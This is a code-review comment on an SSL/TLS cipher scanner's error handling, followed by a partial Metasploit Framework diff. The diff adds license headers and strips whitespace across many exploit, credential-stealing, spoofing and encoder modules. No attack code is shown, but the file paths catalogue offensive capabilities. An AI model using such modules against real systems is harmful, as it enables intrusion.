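Review bot: `test_ssl`, `test_tls`, `test_cipher` and `get_cert` all use `rescue ::Exception => e` and turn every failure into `:rejected` (or nil), so a timeout, a refused connection or a resolver error is recorded as the server rejecting that cipher, and an Interrupt is swallowed too. Because these results feed `Result#standards_compliant?`, an unreliable network path can make a host look better configured than it is. Narrowing to `rescue ::StandardError` and keeping connection failures distinct from handshake refusals would make the report trustworthy. `get_cert` also omits `'Context' => @context`, unlike the other three calls, so the certificate fetch is not made with the same socket context as the cipher tests. Smaller points: `valid?` rewrites `@host` through `Rex::Socket.getaddress` and `validate_params` calls it before every probe, so the lookup repeats per cipher, and the `context` parameter of `initialize` is missing from its YARD block.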
@@ -163,12 +163,12 @@ class CStruct < SStruct return super(index, *other) end end - + # Produce a list of field names def keys @name_table end - + # Iterate through all fields and values def each_pair(&block) @name_table.each do |k| diff --git a/lib/rex/struct2/constant.rb b/lib/rex/struct2/constant.rb index 2dfdc7ec9a..8ea5538e87 100644 --- a/lib/rex/struct2/constant.rb +++ b/lib/rex/struct2/constant.rb @@ -12,7 +12,7 @@ module Struct2 # sized arrays), and probably not a ton more. class Constant - + require 'rex/struct2/element' include Rex::Struct2::Element diff --git a/lib/rex/struct2/generic.rb b/lib/rex/struct2/generic.rb index 217f30e5af..572f025e07 100644 --- a/lib/rex/struct2/generic.rb +++ b/lib/rex/struct2/generic.rb @@ -6,7 +6,7 @@ module Rex module Struct2 class Generic - + require 'rex/struct2/element' include Rex::Struct2::Element @@ -40,7 +40,7 @@ class Generic # example if it is nil. That should only happen for a user # error so that's what I want it to do... string = [ @value ].pack(@packspec) - + if restraint && restraint.max return string.slice(0, restraint.max) else diff --git a/lib/rex/struct2/s_string.rb b/lib/rex/struct2/s_string.rb index 92e8b7605c..199741f36e 100644 --- a/lib/rex/struct2/s_string.rb +++ b/lib/rex/struct2/s_string.rb @@ -6,7 +6,7 @@ module Rex module Struct2 class SString - + require 'rex/struct2/element' require 'rex/struct2/constant' include Rex::Struct2::Element diff --git a/lib/rex/struct2/s_struct.rb b/lib/rex/struct2/s_struct.rb index 0a367c9823..1b4cefb1aa 100644 --- a/lib/rex/struct2/s_struct.rb +++ b/lib/rex/struct2/s_struct.rb @@ -50,7 +50,7 @@ class SStruct elements.each do |e| buff << e.to_s end - + if restraint && restraint.max return buff.slice(0, restraint.max) else diff --git a/lib/rex/sync/thread_safe.rb b/lib/rex/sync/thread_safe.rb index 886cb5f761..4c6cf42158 100644 --- a/lib/rex/sync/thread_safe.rb +++ b/lib/rex/sync/thread_safe.rb 
@@ -4,7 +4,7 @@ require 'timeout' module Rex ### -# +# # This module provides a set of methods for performing various blocking # operations in a manner that is compatible with ruby style threads. # diff --git a/lib/rex/ui/text/color.rb b/lib/rex/ui/text/color.rb index 5a8b25b90f..b408ffda1e 100644 --- a/lib/rex/ui/text/color.rb +++ b/lib/rex/ui/text/color.rb @@ -90,9 +90,9 @@ module Color # # Colorize if this shell supports it # - def do_colorize(*color) + def do_colorize(*color) supports_color?() ? ansi(*color) : '' end -end +end end end end diff --git a/lib/rex/ui/text/input/socket.rb b/lib/rex/ui/text/input/socket.rb index 82e8469b5e..37cf6f24c4 100644 --- a/lib/rex/ui/text/input/socket.rb +++ b/lib/rex/ui/text/input/socket.rb @@ -34,29 +34,29 @@ class Input::Socket < Rex::Ui::Text::Input # Wait for a line of input to be read from a socket. # def gets - + # Initialize the line buffer line = '' - + # Read data one byte at a time until we see a LF while (true) break if line.include?("\n") - + # Read another character of input char = @sock.getc if char.nil? @sock.close return end - + # Telnet sends 0x04 as EOF if (char == 4) @sock.write("[*] Caught ^D, closing the socket...\n") @sock.close return end - + # Append this character to the string line << char @@ -66,13 +66,13 @@ class Input::Socket < Rex::Ui::Text::Input @sock.write("[*] Caught ^C, closing the socket...\n") @sock.close return - + when /\xff\xed\xff\xfd\x06/ @sock.write("[*] Caught ^Z\n") - return + return end end - + return line end diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index 8248126dcd..ff41196550 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -6,7 +6,7 @@ module Rex module Zip -# +# # An Entry represents a logical file or directory to be stored in an Archive # class Entry diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index eb8924aea7..1d5657ebfd 100644 
--- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index b6c9dba312..6bf5e62925 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index cbd59484ba..be8b13c300 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex/proto/natpmp' diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 6881b15080..4fd6348bb9 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb 
@@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index dbbda3a618..09533a1f18 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 7be526fab2..1f438ac858 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -1,4 +1,9 @@ -#!/usr/bin/env ruby +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## require 'msf/core' diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index b659524639..92f1742f96 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' 
diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 5d9af9fc57..74677fb6ec 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -1,4 +1,10 @@ -#!/usr/bin/env ruby +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # Web Crawler. # diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 926af2a6d3..6461f7f99c 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://Metasploit.com/projects/Framework/ +# http://Metasploit.com/projects/Framework/ ## require 'msf/core' diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index f118a88abb..88dc3f787c 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # auxilary/dos/ssl/openssl_aesni require 'msf/core' diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index b76258cf25..3d679c3376 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb 
@@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + ## # A Very simple Module to fuzzer some SMTP commands. # It allows to respect the order or just throw everything at it.... diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index 22591d6907..00e52e93e3 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex/proto/natpmp' diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index e03844bf80..e91efa8cf7 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index e36abc0759..3403a9ed0e 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb 
@@ -1,5 +1,8 @@ ## -# $Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $ +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 3f5814e864..a9b3787fed 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index eedc2a72ce..7af68561c0 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # Thanks to: # ipax, neriberto, flambaz, bperry, egypt, and sinn3r for help diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 1af876e682..6e4e82275d 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index fc16c07d50..1c054168e2 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -1,4 +1,10 @@ ## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex/proto/natpmp' diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 988eeffe29..7b23bb9872 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -1,7 +1,9 @@ +## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ +## require 'msf/core' diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 150d6a5463..261703c0ff 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/Framework/ +# http://metasploit.com/Framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index a4b51ffa92..5d5fe96ee5 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/Framework/ +# http://metasploit.com/Framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index 2095bef790..f7f1a64a6d 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## @@ -152,4 +152,4 @@ class Metasploit4 < Msf::Auxiliary print(@saptbl.to_s) end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index af2c9c6500..46d50232b0 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 564bfdddc7..da586bae41 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index b1e1c552ad..ef53dfc051 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index 3bf02feb67..f06ae9ab71 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 0537944da0..ceb214a8b6 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## @@ -158,4 +158,4 @@ class Metasploit4 < Msf::Auxiliary return end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index d0690058bb..2821857488 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index e188879c66..fface84f17 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index 5f8cc3be61..be9eee6db6 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 263a001a6f..5f1363b84e 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index d68877559a..338a670638 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## @@ -122,4 +122,4 @@ class Metasploit4 < Msf::Auxiliary return end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 21100734ee..dca1f8c607 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index a3223710ca..d0fddc6510 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index 4210baed98..bc42ac7f18 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index ca6c2f5c2f..4029bc6a3d 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -1,4 +1,9 @@ -#!/usr/bin/env ruby +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 080803918b..fd365467c6 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -1,12 +1,8 @@ -## -# $Id:$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index b646e33607..a973f9e6ff 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb 
@@ -1,3 +1,11 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + require 'msf/core' require 'net/dns' require 'resolv' diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index a2577bc89f..2dd6508a68 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -1,12 +1,8 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -14,15 +10,15 @@ require 'rex/encoder/bloxor/bloxor' # # BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit. -# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb) +# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb) # by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape. # # Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to # ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the # backend metamorphic stuff. # -# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a -# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having +# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a +# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having # been publicly released for this, so am unable to compare implementations. # http://census-labs.com/media/packing-heat.pdf # 
@@ -39,7 +35,6 @@ class Metasploit3 < Rex::Encoder::BloXor def initialize super( 'Name' => 'BloXor - A Metamorphic Block Based XOR Encoder', - 'Version' => '$Revision$', 'Description' => 'A Metamorphic Block Based XOR Encoder.', 'Author' => [ 'sf' ], 'Arch' => ARCH_X86, @@ -47,12 +42,12 @@ class Metasploit3 < Rex::Encoder::BloXor 'EncoderType' => Msf::Encoder::Type::Unspecified ) end - + def compute_decoder( state ) - + @machine = Rex::Poly::MachineX86.new( state.badchars ) - + super( state ) end - + end diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index c1840dcc11..ab1b05752e 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 2853947ced..1ce1814d7b 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/projects/framework/ +# http://metasploit.com/projects/framework/ ## require 'msf/core' diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 1d2ffc92ce..ac4e65ebb7 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb 
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index bd825a7a00..11571e816a 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index 514dfd3fb4..e1eac3bc1d 100644 --- 